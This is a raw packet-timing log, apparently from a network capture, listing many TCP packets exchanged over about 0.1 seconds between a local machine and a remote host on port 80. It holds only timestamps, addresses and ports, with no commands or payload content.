                                                    Nov 20, 2024 11:08:09.947046041 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.947217941 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.947268009 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.947361946 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.947375059 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.947385073 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.947406054 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.947421074 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.947977066 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.947989941 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.948000908 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.948021889 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.948038101 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.948419094 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.948431969 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.948442936 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.948455095 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.948467970 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.948482990 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.948507071 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.949016094 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.949071884 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.949201107 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.949213982 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.949246883 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.949260950 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.949321032 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.949332952 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.949345112 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.949393034 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.949393034 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.950838089 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.950850010 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.950860977 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.950871944 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.950886965 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.950901031 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.950922966 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.951157093 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.951169014 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.951179028 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.951216936 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.951216936 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.951447010 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.951459885 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.951468945 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.951508045 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.951508045 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.952704906 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.952717066 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.952728033 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.952739954 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.952750921 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.952761889 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.952796936 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.952796936 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.953318119 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.953330994 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.953340054 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.953346968 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.953375101 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.953407049 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.953943014 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.953963041 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.954004049 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.954004049 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.955082893 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.955142021 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.955497980 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.955535889 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.955547094 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.955560923 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.955593109 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.955593109 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.956460953 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.956474066 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.956516981 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.956517935 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.956901073 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.956914902 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.956923962 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.956934929 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.956955910 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.956989050 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.956989050 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.958204985 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.958216906 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.958228111 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.958266973 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.958297968 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.959367990 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.959381104 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.959392071 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.959403992 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.959439993 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.959439993 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.960805893 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.960819960 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.960829973 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.960841894 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.960867882 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.960867882 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.960923910 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.962161064 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.962174892 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.962187052 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.962223053 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.962223053 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.962902069 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.962917089 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.962929010 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.962960958 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.962960958 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.964071989 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.964087009 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.964097023 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.964108944 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.964128971 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.964129925 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.964163065 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.965150118 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.965162992 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.965181112 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.965207100 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.965240955 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.965240955 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.965667009 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.965679884 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.965691090 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.965730906 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.965730906 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.966542959 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.966556072 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.966567039 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.966578960 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.966592073 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.966624975 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.966624975 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.967683077 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.967695951 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.967711926 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.967756033 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.967756033 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.968373060 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.968390942 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.968403101 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.968416929 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.968426943 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.968455076 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.968527079 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.969511986 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.969527960 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.969538927 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.969551086 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:09.969568968 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.969573021 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:09.969605923 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.031065941 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.031122923 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.031291008 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.031301975 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.031320095 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.031342030 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.031358004 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.031968117 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.031981945 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.031991959 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.032004118 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.032015085 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.032027006 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.032046080 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.034214973 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.034228086 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.034238100 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.034249067 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.034266949 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.034282923 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.034282923 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.034914017 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.034928083 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.034939051 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.034950972 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.034970045 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.034970045 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.034986019 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.037276983 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.037288904 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.037300110 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.037326097 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.037353039 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.037827969 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.037873983 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.037879944 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.037892103 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.037925005 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.043579102 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.043591976 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.043601990 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.043616056 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.043632984 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.043644905 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.043654919 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.043656111 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.043668032 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.043679953 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.043692112 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.043709993 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.043879032 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.046428919 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.046441078 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.046452045 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.046468019 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.046483040 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.046489954 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.046741009 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.046794891 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.046875000 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.046885967 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.046894073 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.046925068 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.046925068 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.047169924 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.047180891 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.047187090 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.047193050 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.047264099 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.049346924 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.049359083 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.049367905 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.049379110 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.049397945 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.049412012 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.050371885 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.050383091 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.050390959 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.050401926 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.050412893 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.050421953 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.050434113 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.050441980 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.050921917 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.050934076 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.050942898 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.050952911 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.050967932 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.050983906 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.050983906 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.051640987 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.051652908 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.051664114 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.051676989 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.051716089 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.051716089 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.051716089 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.051795959 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.051855087 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.052642107 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.052654982 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.052666903 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.052695990 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.052695990 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.052727938 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.052803993 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.052855968 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.053801060 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.053817034 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.053828955 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.053841114 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.053849936 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.053862095 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.053862095 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.053894997 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.053894997 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.055361986 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.055372953 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.055382967 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.055429935 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.055429935 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.055533886 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.055551052 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.055571079 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.055598021 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.055598021 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.055629015 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.057280064 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.057292938 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.057302952 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.057334900 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.057334900 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.058032036 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.058043003 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.058079958 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.059835911 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.059848070 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.059891939 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.061108112 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.061120033 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.061162949 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.062727928 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.062740088 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.062782049 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.062783003 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.063093901 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.063106060 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.063116074 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.063126087 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.063155890 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.063155890 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.064228058 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.064239979 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.064249992 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.064289093 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.064289093 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.065906048 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.065958977 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.066076994 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.066087961 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.066124916 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.067435026 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.067445993 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.067456961 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.067467928 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.067490101 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.067490101 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.067522049 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.069164038 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.069174051 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.069183111 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.069192886 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.069219112 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.069251060 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.069251060 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.070734024 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.070744991 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.070785999 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.070786953 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.070880890 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.070935965 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.071175098 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.071187019 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.071197033 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.071208000 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.071230888 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.071230888 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.071261883 CET4916480192.168.2.2266.63.187.231
